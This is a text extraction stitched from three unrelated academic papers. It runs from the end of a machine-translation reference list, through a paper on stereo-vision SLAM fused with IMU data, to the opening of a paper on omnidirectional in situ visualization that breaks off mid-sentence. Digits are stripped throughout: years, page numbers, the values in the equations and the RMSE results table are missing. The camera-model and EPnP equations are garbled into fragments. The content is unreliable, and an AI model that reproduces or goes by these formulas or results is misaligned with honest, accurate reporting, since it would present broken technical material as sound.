(emnlp- conll), pages – , prague, czech republic. mauro cettolo, christian girardi, and marcello federico. . wit : web inventory of transcribed and translated talks. in proceed- ings of the th conference of the european association for machine translation (eamt), pages – , trento, italy. yee seng chan, hwee tou ng, and david chiang. . word sense disambiguation im- proves statistical machine translation. in pro- ceedings of the th annual meeting of the association for computational linguistics, pages – , prague, czech republic. heeyoul choi, kyunghyun cho, and yoshua bengio. . context-dependent word repre- sentation for neural machine translation. com- puter speech & language, : – . christiane fellbaum, editor. . wordnet: an electronic lexical database. the mit press, cambridge, ma, usa. thomas s. ferguson. . a bayesian analysis of some nonparametric problems. the annals of statistics, ( ): – . sergey grin and lawrence page. . the anatomy of a large-scale hypertextual web search engine. computer networks and isdn systems, ( - ): – . felix hill, kyunghyun cho, sébastien jean, and yoshua bengio. . the representational ge- ometry of word meanings acquired by neural machine translation models. machine transla- tion, ( ): – . roman kern, markus muhr, and michael granitzer. . kcdc: word sense induction by us- ing grammatical dependencies and sentence phrase structure. in proceedings of the th in- ternational workshop on semantic evaluation (semeval- ), pages – , los angeles, ca, usa. guillaume klein, yoon kim, yuntian deng, jean senellart, and alexander m. rush. . open- nmt: open-source toolkit for neural machine translation. corr, abs/ . v . philipp koehn. . europarl: a parallel cor- pus for statistical machine translation. in pro- ceedings of mt summit x, pages – , phuket, thailand. ioannis korkontzelos and suresh manandhar. . uoy: graphs of ambiguous vertices for word sense induction and disambiguation. in proceedings of the th international work- shop on semantic evaluation (semeval ), pages – , los angeles, california. jiwei li and dan jurafsky. . do multi-sense embeddings improve natural language under- standing? in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , lisbon, portugal. frederick liu, han lu, and graham neubig. . handling homographs in neural machine trans- lation. corr, abs/ . v . thang luong, hieu pham, and christopher d. manning. . effective approaches to attention-based neural machine translation. in proceedings of the conference on empir- ical methods in natural language processing (emnlp), pages – , lisbon, portugal. james macqueen. . some methods for clas- sification and analysis of multivariate obser- vations. in proceedings of the th berkeley symposium on mathematical statistics and probability, pages – . oakland, ca, usa. suresh manandhar, ioannis p. klapaftis, dmitriy dligach, and sameer s. pradhan. . semeval- task : word sense induction and disambiguation. in proceedings of the th international workshop on semantic evaluation (semeval ), pages – , los angeles, ca, usa. tomas mikolov, ilya sutskever, kai chen, greg s corrado, and jeff dean. . distributed representations of words and phrases and their compositionality. in advances in neu- ral information processing systems (nips), pages – . andrea moro and roberto navigli. . semeval- task : multilingual all-words sense disambiguation and entity linking. in proceedings of the th international workshop on semantic evaluation (semeval ), pages – , denver, colorado. association for computational linguistics. steven neale, luıs gomes, eneko agirre, oier lopez de lacalle, and antónio branco. . word sense-aware machine translation: including senses as contextual features for im- proved translation models. in proceedings of the th international conference on lan- guage resources and evaluation (lrec ), pages – , portoroz, slovenia. arvind neelakantan, jeevan shankar, alexandre passos, and andrew mccallum. . efficient non-parametric estimation of multiple embed- dings per word in vector space. in proceedings of the conference on empirical meth- ods in natural language processing (emnlp), pages – , doha, qatar. kishore papineni, salim roukos, todd ward, and wei-jing zhu. . bleu: a method for automatic evaluation of machine transla- tion. in proceedings of the th annual meeting of association for computational linguistics, pages – , philadelphia, usa. ted pedersen. . duluth-wsi: senseclusters applied to the sense induction task of semeval- . in proceedings of the th international work- shop on semantic evaluation (semeval ), pages – , los angeles, ca, usa. fabian pedregosa, gaël varoquaux, alexandre gramfort, vincent michel, bertrand thirion, olivier grisel, mathieu blondel, peter prettenhofer, ron weiss, vincent dubourg, jake vanderplas, alexandre passos, david http://www.aclweb.org/anthology/s - http://www.aclweb.org/anthology/s - cournapeau, matthieu brucher, matthieu perrot, and Édouard duchesnay. . scikit- learn: machine learning in pmaython. journal of machine learning research, : – . xiao pu, nikolaos pappas, and andrei popescu- belis. . sense-aware statistical machine translation using adaptive context-dependent clustering. in proceedings of the second con- ference on machine translation, pages – , copenhagen, denmark. alexandre rafalovitch and robert dale. . united nations general assembly resolutions: a six-language parallel corpus. in proceedings of mt summit xii, pages – , ontario, on. canada. annette rios, laura mascarell, and rico sennrich. . improving word sense dis- ambiguation in neural machine translation with sense embeddings. in second confer- ence on machine translation, pages – , copenhagen, denmark. jinsong su, deyi xiong, shujian huang, xianpei han, and junfeng yao. . graph-based col- lective lexical selection for statistical machine translation. in proceedings of the conference on empirical methods in natural language pro- cessing (emnlp), pages – , lisbon, portugal. ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neural networks. in advances in neural information processing systems (nips), pages – . haiqing tang, deyi xiong, oier lopez de lacalle, and eneko agirre. . improv- ing translation selection with supersenses. in proceedings of the th international confer- ence on computational linguistics (coling), pages – , osaka, japan. ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n gomez, Łukasz kaiser, and illia polosukhin. . attention is all you need. in advances in neural information processing systems, pages – . david vickrey, luke biewald, marc teyssier, and daphne koller. . word-sense disambigua- tion for machine translation. in proceedings of the conference on human language technology and empirical methods in natural language processing (hlt-emnlp), pages – , vancouver, bc, canada. lesly miculicich werlen, nikolaos pappas, dhananjay ram, and andrei popescu-belis. . self-attentive residual decoder for neural machine translation. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies (naacl-hlt), pages – , new orleans, la, usa. deyi xiong and min zhang. . a sense- based translation model for statistical machine translation. in proceedings of the nd annual meeting of the association for computational linguistics, pages – , baltimore md, usa. zhen yang, wei chen, feng wang, and bo xu. . multi-sense based neural machine trans- lation. in international joint conference on neural networks, pages – , anchorage, ak, usa. biao zhang, deyi xiong, jinsong su, and hong duan. . a context-aware recurrent encoder for neural machine translation. ieee/acm transactions on audio, speech and language processing (taslp), pages – . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - improved stereo vision robot locating and mapping method yu haige school of computer science and engineering xi’an technological university xi’an, shaanxi, china e-mail: @qq.com yu fan school of computer science and engineering xi’an technological university xi’an, shaanxi, china e-mail: yffshun@ .com wei yanxi school of computer science and engineering xi’an technological university xi’an, shaanxi, china e-mail: @qq.com abstract—vision-based slam has an outstanding problem is not work when the camera fast motion, or camera operating environment characterized by scarce. aiming at this problem, this paper proposes a slam method of imu and vision fusion. this article uses a stereo camera to extract the image orb feature points. during the camera movement, if the number of extracted feature points is less than a certain threshold and the camera movement cannot be estimated or the estimated camera rotation and translation is greater than a certain threshold, the camera pose is estimated by fusing imu , otherwise use feature points to estimate camera pose. this paper uses non-linear optimization methods to perform pose estimation of pure feature points and pose estimation of fused imu, respectively. the experimental results show that binocular vision slam with imu information can estimate the camera pose more accurately. keyword-robot; imu; stereo vision; slam i. introduction with the development of robot technology, more and more robots are approaching our lives, such as sweeping robots, shopping mall robots, etc. mobile robots are the product of the cross fusion of various disciplines and technologies. among them, slam(simultaneous localization and mapping) is an important technology for mobile robots. slam means that the robot builds a map of the surrounding environment in real time based on sensor data without any prior knowledge, and infers its own positioning based on the map. from the s to the present, more and more sensors are used in slam, from early sonar, to later d/ d lidar, to monocular, binocular, rgbd, tof and other cameras. compared with lidar, cameras used in vision slam have become the focus of current slam research due to their advantages such as low price, light weight, large amount of image information, and wide application range. stereo cameras generally consist of two pinhole cameras placed horizontally. compared to monocular vision's scale uncertainty and pure rotation problems, binocular cameras can directly calculate the pixel depth. at the same time, compared to rgb-d cameras, stereo cameras collect images international journal of advanced network, monitoring and controls volume , no. , directly from ambient light and can be used indoors and outdoors. compared with lidar, the main disadvantage of the camera as a slam sensor is that when the camera moves too fast, the camera will blur images, and the camera will not work in a scene with insufficient environmental feature textures and few feature points. aiming at the problems of the above-mentioned visual slam system, this paper proposes an algorithm that fuses imu and slam. through the fusion of imu, it can provide a good initial pose for the system. at the same time, during the camera movement process, it makes up for the shortcomings of visual slam, ensuring the accuracy of the camera pose estimation in the case of fast camera movement and lack of environmental texture. ii. related works a. camera coordinate system camera models generally have four coordinate systems: a pixel coordinate system, an image coordinate system, a world coordinate system, and a camera coordinate system. figure : figure . camera related coordinate system among them, w w w w o x y z is the world coordinate system. the world coordinate system is the reference coordinate system in the visual slam system. the positions of the camera trajectory and map points are described based on this coordinate system. the unit is m . i o xy is the image coordinate system. the image coordinate system uses the intersection of the camera optical center and the image plane coordinate system as the origin. the unit is mm . c c c c o x y z is the camera coordinate system. the camera coordinate system uses the camera optical center as the origin, and the directions parallel to the x -axis and y -axis of the image coordinate system are respectively taken as the c x -axis and c y -axis, and the direction perpendicular to the image plane is the c z -axis. the unit is m . o uv is the pixel coordinate system. the origin of the pixel coordinate system is generally the upper left corner of the image, with the u axis to the right parallel to the x axis, and the v axis to the y axis. the unit is pixel. b. camera projection model the camera maps the coordinate points of the three-dimensional world to the two-dimensional image plane. this process is generally a pinhole model. under the pinhole model, it is assumed that there is a spatial point p , and the coordinates of the point p are [ , , ] t x y z . after the projection of the small hole o , the point p falls on the imaging plane o xy , and the imaging point is p , the p -point coordinate is [ , , ] t x y z . let the distance from the imaging plane to the small hole be the focal length f . therefore, according to the principle of triangle similarity, there are:  z x y f x y     international journal of advanced network, monitoring and controls volume , no. , so we can get:  x x f z y y f z         the difference between the pixel coordinate system and the imaging plane is a zoom and a translation of the origin. suppose that the pixel coordinates are scaled  times on the u axis and  times on the v axis, and the origin is translated , t x y c c   , so we can get:  x y u x c v y c          equation ( ) is substituted into equation ( ) to get:  x x y y x u f c z y v f c z           the unit of f is m and the unit of  and  is /pixel m , so the unit of , x f and y f is pixel . written as a matrix:  x x y y u f c x v f c y z z z                           ΚΡ   among them, the matrix k is called the internal parameter matrix of the camera, and p is the coordinate representation of the space point in the camera coordinate system. let the coordinate p of the space point in the camera coordinate system correspond to the coordinate pw in the world coordinate system, and use coordinate transformation to obtain:  ( ) uv w w u z z v              p k rp t ktp   among them, t represents the pose of the camera relative to the world coordinate system, and can also be called the external parameter of the camera. in summary, the pinhole camera model uses the triangle similarity relationship to obtain the relationship between space points and pixels, which is a relatively ideal model. in practice, there will be errors in the manufacture and installation of optical lenses, which will affect the propagation of light during the imaging process and cause distortion in the images collected by the camera. here we mainly consider radial distortion and tangential distortion. radial distortion is caused by the shape of the lens, and the distortion increases as the distance between the pixel and the center of the image increases. therefore, a polynomial function can be used to describe the changes before and after the distortion, that is, the quadratic and higher-order polynomial functions related to the distance between the pixel and the center of the image can be used for correction. the polynomial of the coordinate change before and after the radial distortion correction is as follows:  ( r r r ) ( r r r ) corrected corrected x x k k k y y k k k             among them,  , t x y is the coordinates of the uncorrected points, and   t corrected corrected x y, is the coordinates of the points after the distortion is corrected. r is the distance from the point (x, y) to the origin. 𝑘 ,𝑘 and 𝑘 are three radial distortion international journal of advanced network, monitoring and controls volume , no. , parameters. usually these three parameters can be obtained by the calibration step. for tangential distortion, the reason is that the lens and the imaging plane cannot be strictly parallel during camera assembly. tangential distortion can be corrected using two other parameters, p and p :  (r ) (r ) corrected corrected x x p xy p x y y p xy p y             considering the two types of distortion, we can find the correct position of a pixel in the pixel coordinate system through distortion coefficients:  ( ) ( ) ( ) ( ) corrected corrected x x k r k r k r p xy p r x y y k r k r k r p xy p r y                  in summary, the parameters describing the camera model mainly include: in the camera's internal parameter matrix, and distortion correction parameters. c. stereo camera ranging principle the binocular camera generally consists of two pinhole cameras placed horizontally, and the two cameras observe an object together. the aperture centers of both cameras are located on one axis, and the distance between the two is called the baseline b of the binocular camera. there is an existing space point p , which is an image in the left-eye camera and the right-eye camera, and is denoted as , l r p p . due to the presence of the camera baseline, these two imaging positions are different. remember that the coordinates of the imaging on the left and right sides are , l r x x , which can be seen from the similarity of the triangles:  l r b u uz f z b      we can get:  fb z d    the above model is an ideal model, which aims to explain the principle of measuring the actual three-dimensional point depth of the binocular camera. in practical applications, due to factors such as manufacturing and installation, it is difficult to achieve that the imaging planes of the binocular cameras are strictly on the same plane and the optical axes are strictly parallel. therefore, before using a binocular camera for measurement, it should be calibrated to obtain the left and right camera internal parameters and the relative position relationship between the left and right cameras. iii. pose estimation algorithm at present, the fusion method of monocular vision sensor and imu can be divided into two types: loose coupling and tight coupling[ ]. loose coupling is based on the vision sensor and imu as two separate modules, both of which can calculate the pose information, and then fused by ekf[ ] and so on. tight coupling refers to the non-linear optimization of vision and imu data to obtain pose estimates. because tight coupling can make full use of each sensor's data, this paper uses tight coupling to fuse vision and imu data. firstly, the purely visual feature point pose estimation method is used to estimate the camera pose. then, during the camera movement, if the number of extracted feature points is less than a certain threshold value, the camera movement cannot be estimated or the estimated camera rotation and translation are greater than a certain threshold value, the camera pose is estimated by fusing the imu, otherwise feature points are still used to estimate the camera pose. a. pose estimation using pure visual information the orb (oriented fast and rotated brief) algorithm was proposed by ethan rublee et al. in [ ]. the orb feature is composed of the fast international journal of advanced network, monitoring and controls volume , no. , feature and the brief descriptor. it adds orientation and scale invariance to the fast feature. features are described using binary brief descriptors. when performing feature matching, the descriptors between feature points and feature points are compared. the binocular camera can directly obtain the corresponding d position of the pixel under the known pixel matching of the left and right camera images. therefore, the stereo camera-based slam system can use the known d point and its projection match in the current frame to obtain the current camera pose without the need to solve camera motion using epipolar geometry[ ]. this paper first uses the method of epnp[ ] to solve the camera pose. the epnp pose solution method can more effectively use the matching point information, and iteratively optimize the camera pose. epnp is known as the coordinates  , , ,...,wip i n of n space points in the world coordinate system and their corresponding coordinates  , , ,...,cip i n in the image coordinate system to solve the rotation matrix r and translation vector t of the camera movement.set four non-coplanar virtual control points in the world coordinate system, whose homogeneous sitting marks are:  | , , , wic i  .the relationship between the world coordinates of the space points and the control points is as follows:  , w w i ij j ij j j p c with          once thevirtual control point is determined and the premise that the four control points are not coplanar,  , ,..., ij j  is the only one determined.in the image coordinate system, the same weighting sum relationship exists: c c i ij j j p c    substituting equation ( ) into the camera model gives:  , c i x x j c c c i i i j y y ij j j j c j u f c x i s v p c f c y z                                   k k  the image coordinates , i i u v in equation ( ) are known, so:  c i ij j j s z      from equations ( ) and ( ):  ( ) ( ) c c ij x j ij x i j j c c ij y j ij y i j j f x c u z f y c v z                       in order to obtain the coordinates of the d point into the camera coordinate system, it is assumed that ij  in the camera coordinate system is consistent with ij  in the world coordinate system, that is, to find the rotation and translation of the four control points. solve linear equations:  mx   among them, m is a n matrix, and [ , , , ] ct ct ct ct c c c cx is a vector composed of unknowns to be solved.  n i i i v   x   international journal of advanced network, monitoring and controls volume , no. , i v is the right singular vector of m, and the corresponding singular value is . solve the tm m eigen value and eigenvector. the eigenvector with eigenvalue of is i v . n is the dimension of the t m m space, and i  is the coefficient to be determined. depending on the position of the reference point, the spatial dimension of the matrix tm m may take the values , , , . according to the same distance between the control points in the world coordinate system and the camera coordinate system, six constraints can be obtained, and the pending coefficients can be solved. when n = , according to the constraints:      i j w w i j v v c c      and so:  [ ] [ ] [ , ] [ , ] [ ] [ ] [ , ] [ , ] i j w w i ji j i j i j v v c c v v            when n = :  [ ] [ ] [ ] [ ] ( ) i i j j w w i j v v v v c c         since  and  only appear in the equation as quadratic terms, let [ , , ] t    β , and use the vector ρ to represent all w w i j c c , thus obtaining the equation:  lβ = ρ   where l is a  matrix composed of v and v . when n = , l is a  matrix. in summary, the coordinate solution of the reference point in the camera coordinate system can be obtained as the initial value of the optimization, the optimization variable is [ , ,..., ] t n   β , and the objective function is:  ( , ) . . ( ) ( ) c c w w i j i j i j s t i j error c c c c     β   optimize β corresponding to the smallest dimension of the error, get the vector x , and restore the coordinates of the control point in the camera coordinate system. at the same time, the coordinates of the reference point in the camera coordinate system are obtained according to the centroid coordinate coefficient. finally, according to the coordinates of a set of point clouds in the two coordinate systems, the pose transformations of the two coordinate systems are obtained. the solution steps are as follows: a) find the center point:  , c w i ic w c c p p p p n n       b) to the center point:  , c c c w w w i i c i i c q p p q p p      c) calculate the h matrix:  t n c w i i i q q   h   d) svd decomposition of h matrix:  t  h u v   e) calculate the rotation r:  t r uv   if r < , then r( ,.) =-r( , ). international journal of advanced network, monitoring and controls volume , no. , f) calculate displacement t:  c w t p p  r   taking the results of epnp solution as initial values, the method of g o was used to optimize the pose of the camera nonlinearly. construct the least squares problem and find the best camera pose:  * ^ arg min exp( ) n i i i i u k p s        among them, i u is the pixel coordinates of the projection point, k is the camera internal reference,  is the camera pose, and i p is the space point coordinate. b. camera pose estimation method based on imu the measurement frequency of the imu is often higher than the frequency at which the camera collects pictures. for example, the binocular camera used in this article has a frame rate of up to fps and an imu frequency of up to hz. the difference in frequency between the two results in multiple imu measurements between the two frames. therefore, in order to ensure the information fusion of the two sensors, it is necessary to pre-integrate [ ] the data of the imu. that is, only the imu information between the two image moments is integrated to obtain the relative pose value, and the integration result is saved for later joint optimization.the imu-based camera pose estimation method mainly includes three coordinate systems: the world coordinate system, the imu coordinate system, and the camera coordinate system. all pose and feature point coordinates are finally expressed in the world coordinate system. during the calculation process, this article will convert the state quantity in the camera coordinate system to the imu coordinate system, and then to the world coordinate system.in this article, the letter w is used to represent the world coordinate system, the letter b is used to represent the imu coordinate system, wb r is used to represent the rotation matrix from the imu coordinate system to the world coordinate system, and wb p is used to represent the translation matrix from the imu coordinate system to the world coordinate system. the acceleration and angular velocity of the imu are:  ( ) ( ) ( ) ( ) a ( ) ( )( a( ) ) ( ) ( ) g g b wb b wb t a a b wb wb w w t t b t t t r t t g b t t              among them, ( )ab t and ( )gb t represent the bias of the accelerometer and gyroscope respectively, ( )a t and ( )g t represent the noise of the accelerometer and gyroscope respectively, and w g represents the gravity vector in the world coordinate system. the derivatives of rotation, velocity, and translation are expressed as:  ^ wb wb b wb w wb w wb w wb w wb r r v a p v      the rotation, speed and translation in the world coordinate system can be obtained by the general integral formula:  ( ) ( ) ( ( ) ) ( ) ( ) a( ) ( ) ( ) ( ) a( ) t t wb wb b wb t t t w w w t t t t t w w w w t t r t t r t exp d v t t v t d p t t p t v d d                               use equation ( ) in discrete time for euler integration: international journal of advanced network, monitoring and controls volume , no. ,  ( ) ( ) ( ( ) ) ( ) ( ) a( ) ( ) ( ) ( ) a( ) wb wb b wb w w w w w w w r t t r t exp t t v t t v t t t p t t p t v t t t t                   the imu model is obtained from equations ( ) and ( ): ( ) ( ) (( ( ) ( ) ( ) ) ( ) ( ) ( )(a( ) ( ) ( )) ( ) ( ) ( ) ( )(a( ) ( ) ( )) g gd a ad a ad r t t r t exp t b t t t v t t v t g t r t t b t t t p t t p t v t t g t r t t b t t t                               suppose there are two image frames with time i t and j t , j i t t . therefore, the imu's pre-integration observation model is:  ( ) ( ) ( ) t ij i j ij t ij i j i ij ij t ij i j i i ij ij ij r r r exp v r v v g t v p r p p v t g t p                      among them, a, b, and c are the noise terms of the rotation amount, the pre-integrated speed noise term, and the pre-integrated translation noise term, respectively. for the pose between two adjacent frames, this paper still uses a nonlinear optimization method to fuse imu information and visual information. among them, the state quantities that need to be optimized are:   , , , ,j j j j jwb w b w b g ar p v b b    in equation ( ), j wb r , j wb v , and j wb p are the rotation, velocity, and translation of the imu coordinate system relative to the world coordinate system at time i, and the random walk bias of the gyroscope and accelerometer at time i, respectively. therefore, the optimal state quantity  is solved by optimizing the visual reprojection error and the imu measurement error:  * ( , arg min( + ( , )) proj k j imu k e e i j     )   c. experimental design the upper computer of the experimental platform in this article is a laptop with ubuntu . version, running memory is g, processor model is core i u, and the main frequency is . ghz. the robot platform is a dashgo d robot mobile platform that supports the ros development system. the overall size is   and the diameter of the driving wheel is mm. the binocular camera sensor used is mynt eye d -ir- /color. the experiments in this paper are mainly aimed at the positioning accuracy of the robot. the evaluation index is the rmse (root-mean-square-error) of the robot position:  ˆ( ) n i i i rmse p p n      where ˆ i p is the estimated robot position and i p is the actual robot position. figure . robot straight driving positioning experiment international journal of advanced network, monitoring and controls volume , no. , in this paper, robot positioning experiments are performed in corridor environments with insignificant environmental characteristics and indoor environments with rich characteristics. in a corridor environment, a mobile robot is used to carry experimental equipment to travel at a constant speed of m in the positive direction of the camera, and then the positioning accuracy of pure vision and the positioning accuracy of vision fusion imu are recorded separately. in a feature-rich indoor environment, a robot linear experiment was also performed to make the mobile robot move forward at a constant speed of m in the positive direction of the camera, but the speed was . times that of the previous experiment. perform multiple experiments and record the results. table i. experimental result robot operating environment pure visual rmse/m visual fusion imu rmse/m low-texture corridor environment . . feature-rich environment . . from the experimental results, it can be seen that the stereo vision positioning error of the fusion imu is less than the pure vision positioning error, which indicates that the visual positioning of the robot with the fusion imu is more accurate than the vision-only positioning in low-texture environments and fast robot movements. degree. iv. conclusion in this paper, the robot positioning technology in the robot system is researched, and a binocular vision fusion imu-based robot positioning method is proposed. compared with the pure vision robot localization method, the proposed method is more robust in low-textured environments and fast robot movements. the experimental results show that the visual positioning method integrated with imu solves the defects of pure visual positioning to a certain extent and improves the positioning accuracy of the robot. reference [ ] agostino martinelli. closed-form solution of visual-inertial structure from motion[j]. international journal of computer vision, , ( ): - . [ ] smith r c, cheeseman p. on the representation and estimation of spatial uncertainty[j]. international journal of robotics research, , ( ): - . [ ] rublee e, rabaud v, konolige k, et al. orb: an efficient alternative to sift or surf[c]// international conference on computer vision. ieee, . [ ] gao xiang, zhang tao. fourteen lectures on visual slam [m]. beijing: publishing house of electronics industry, . [ ] v. lepetit, f. moreno-noguer, p. fua. epnp:an accurate o(n) solution to the pnp problem[j]. international journal of computer vision, , ( ): - . [ ] forster c, carlone l, dellaert f, et al. on-manifold preintegration for real time visual--inertial odometry[j]. ieee transactions on robotics, , ( ): - . d street view: a video-based visualization method d street view: a video-based visualization method akira kageyama and naohisa sakamoto graduate school of system informatics, kobe university, kobe, japan abstract we propose a new visualization method for massive supercomputer simulations. the key idea is to scatter multiple omnidirectional cameras to record the simulation via in situ visualization. after the simulations are complete, researchers can interactively explore the data collection of the recorded videos by navigating along a path in four-dimensional spacetime. we demonstrate the feasibility of this method by applying it to three different fluid and magnetohydrodynamics simulations using up to , omnidirectional cameras. subjects scientific computing and simulation, visual analytics keywords scientific visualization, high performance computing, computer simulation, in situ visualization, video-based visualization, omnidirectional visualization, multi-viewpoint visualization, interactive exploration of video dataset, new method for visualization of supercomputer simulations introduction visualization is indispensable to comprehend the time development of complex phenomena captured as numerical data by supercomputer simulations. for three- dimensional ( d) fluid flow simulations, for example, pressure, velocity, vorticity, and other d fields are saved for post-hoc exploratory visualization. it is commonplace to save d fields without thinning out to maintain the spatial resolution of the simulation. in contrast, it is uncommon to store d fields without thinning them out in the temporal dimension, and the d data are usually output after very long intervals of time. if one attempts to save all the d fields within very short intervals, the numerical data will flood the disk space of the supercomputer system. the temporal thinning before the visualization often necessitates the discarding of valuable information. this situation will not improve in the future, but will most likely worsen as supercomputer technology advances. we overcome the above-mentioned problems using our new in situ visualization method, wherein visual recordings are made using the supercomputer system during simulation. because the recorded images are two-dimensional ( d), the data size is naturally smaller—a compression of the raw d data whereof the image is produced. in addition, lossless compression algorithms based on arithmetic coding are also available to reduce the size of the recordings even further. in situ visualization already plays an essential role in large-scale simulations (ma et al., ; ross et al., ; ma, ; childs et al., ). major application programs for general-purpose visualization are now armed with in situ libraries or tools, such as catalyst (ayachit et al., ) for paraview and libsim (whitlock, favre & meredith, ) for how to cite this article kageyama a, sakamoto n. . d street view: a video-based visualization method. peerj comput. sci. :e doi . /peerj-cs. submitted april accepted september published november corresponding author akira kageyama, kage@port.kobe-u.ac.jp academic editor gang mei additional information and declarations can be found on page doi . /peerj-cs. copyright kageyama and sakamoto distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:kage@�port.�kobe-u.�ac.�jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ visit. these applications have been developed based on visualization tool kit (vtk) (schroeder, martin & lorensen, ). opengl is used for hardware-accelerated rendering in vtk when the graphics processing unit (gpu) is available. for a supercomputer system without gpus, opengl functions can be executed using osmesa. software optimization technology, such as simd extension instructions for software rasterization processing, are included in osmesa. based on those technologies, a high-quality rendering framework, such as embree (wald et al., ) and ospray (wald et al., ), capable of executing rendering processing at high speeds have been developed. to execute the in situ visualization process efficiently on the supercomputing system, an adaptable data i/o framework called as adios (lofstead et al., ) has been developed. adios provides a simple and flexible approach for data transmission, including asynchronous communication between the simulation and visualization processes (wang et al., ; kress et al., ). a generic in situ interface sensei (ayachit et al., ) provides simulation researchers with portable interface for other in situ infrastructure such as catalyst, libsim, and ospray. a shortcoming of conventional in situ visualizations is that they deprive users of interactive control. here, interactive control means that users can, in real time, change visualization-related settings, such as the viewing position and direction. the interactivity also includes the capability to change the visualization method (e.g., from isosurface to volume rendering) applied to the target data and to tune the related parameters. in the conventional in situ visualization method, one has to resubmit the same simulation job to obtain a different visualization setting, for example, volume renderings from a different point of view. there are several proposals to incorporate the interactivity into in situ visualization. kawamura, noda & idomura ( ) developed an in situ visualization method that is an extension of the particle-based rendering method (sakamoto et al., ) to the concurrent in situ visualization. in the particle-based rendering method, a dataset, represented as a set of particles, is produced by simulation. the particle dataset, whose size is much smaller than the raw numerical data, is transmitted to computer system for visualization with gpus and interactively visualized. tikhonova, correa & ma ( a) and tikhonova, correa & ma ( b) proposed “proxy image” method to realize interactive volume rendering by making use of intermediate representation of the data. this method was extended to the in situ visualization by ye, miller & ma ( ). matthes et al. ( ) developed in situ library isaac for supercomputer simulations, by which users can interactively analyze data without the deep copy. in our previous article (kageyama & yamada, ), we proposed an interactive in situ visualization method, in which we place visualization cameras on a spherical surface that covered the target region, as is schematically shown by the small circles in fig. a. the simulation results are rendered with several visualization methods and parameters from the multiple viewpoints in the d space. because the cameras focus on a point in the simulation region, as suggested by the arrows in the figure, we can observe the structures and dynamics in the simulation from various directions. the sequence of images are complied as videos that are indexed with the camera locations, before applying kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ interactive analysis of the video collection with dedicated exploratory visualization software. this method can be regarded as an application of the image-based rendering (shum & kang, ) in computer graphics to the scientific visualization. in the image-based rendering, an image viewed from a specified point is calculated from images taken from different view points. among various approaches to image-based rendering, our approach is closer to “light field rendering” (levoy & hanrahan, ), where new images are generated only through the image, not through the geometry data. ahrens et al. ( ) also developed the image-based in situ visualization method and implemented as cinema viewer, which is applied to various simulations (o’leary et al., ; banesh et al., ). because in situ visualization can produce a large number of images at fine time intervals, it is natural to save the sequence of images taken from a single camera as a single video file. a video file has an advantage over still images, that is, we can apply advanced video compression technology to it. the small storage requirement of a compressed video file allows us to save a large number of them (berres et al., ), within the same disk space for storing raw numerical data. therefore, we can set numerous visualization cameras with different visualization settings. an increased number of video capturing virtual cameras implies an increased usage of the supercomputing resources, besides those necessary for the simulation. however, we note that it is not uncommon that only a portion of the available computing resources are utilized by a single simulation, even when the simulation code is highly optimized. in other words, the computing resource capacity of today’s supercomputer system is much larger than is being utilized by simulations. thus, it would be quite appropriate to use surplus processor cores for our in situ visualization. a natural extension of our previous approach (kageyama & yamada, ) is to place the visualization cameras all over the simulation region, that is, not only around it but also inside the region, as is schematically shown by the small circles in fig. b. an apparent problem in this d distribution of the visualization cameras is that we cannot specify the view-direction of each camera when we have no a priori knowledge of the locations to be focused on. to resolve this problem, we propose in this article to use omnidirectional visualization cameras that have the full (= p steradian) solid view angle, as suggested by the arrows in fig. b. if we could scatter such cameras all over the simulation region, almost all, if not all, occurring phenomena would be recorded by some nearby cameras. figure schematically shows the concept of the proposed method. we place lots of omnidirectional cameras (blue spheres in fig. a). each camera produces a sequence of omnidirectional images, and we store them as a video file. when we place c cameras and apply v kinds of visualizations on each of them, we obtain c × v video files in total as a result of simulation (fig. b). after the simulation, it is possible to pick up one or more of the video files and play it on a pc with a commonly available video player. although, the displayed images are distorted because they are captured by omnidirectional cameras. supposing that the picked-up video is recorded by the c-th camera ( ≤ c < c) for the v-th visualization kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ method ( ≤ v < v), herein referred to as movc,v, what the common video player does is to extract the sequence of images in movc,v and presents them on the pc’s screen one after another. in the “virtual museum” by miller et al. ( ), the viewer interactively specifies the video to be played at one time. an important function in our method is that we extract a sequence of still images from different video files, such as movc ,v, movc ,v, movc ,v, ⋯, as denoted by the magenta arrows connecting figs. a and b. the extracted sequence of figure visualization cameras (small white circles) and simulation boundary (rectangle). (a) in our previous article (kageyama & yamada, ), we placed the cameras on a spherical surface around the simulation region. arrows represent the viewing direction. all the cameras are focusing on a point in the simulation region. (b) in the present article, we propose to place omnidirectional cameras all over the simulation space. each camera records the full solid view angle. full-size doi: . /peerj-cs. /fig- figure concept of d street view. (a) we place lots of omnidirectional cameras (blue spheres) in the simulation space and apply in situ visualization with them. (b) each camera records the time develop- ment of the simulation viewed from its position with p steradian and the omnidirectional images are compiled as a video. the video files are tied with the position data, and they constitute a video data collection. (c) a dedicated application program extracts a sequence of images from the video data collection as a smooth (regular, not omnidirectional) video on a pc window. the user interactively specifies the position, direction, and time (or frame) to extract images from the data collection. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the images is presented as a video by a dedicated application program (see fig. c). the program excerpts a partial field-of-view around a user-specified direction from the omnidirectional image. the user’s experience is similar to walking around a specific region of interest. we can also switch the currently applied visualization method, for instance, from va to vb, by exchanging the input video file from movc,va to movc,vb. this switching experience is almost the same as that of standard post-hoc visualizations. the difference, however, being that the exchange is quick in our method even if the switched visualization method vb is a computationally heavy one. the rendering has already been done on the supercomputer. we can abstractly think of the video data collection as a set of videos with captured events from and within the simulation space. (we consider d simulations in this article). since a video itself is a dataset of still images that are sequentially ordered in time, we can also regard the video data collection as a set of still images that are distributed in d spacetime. this 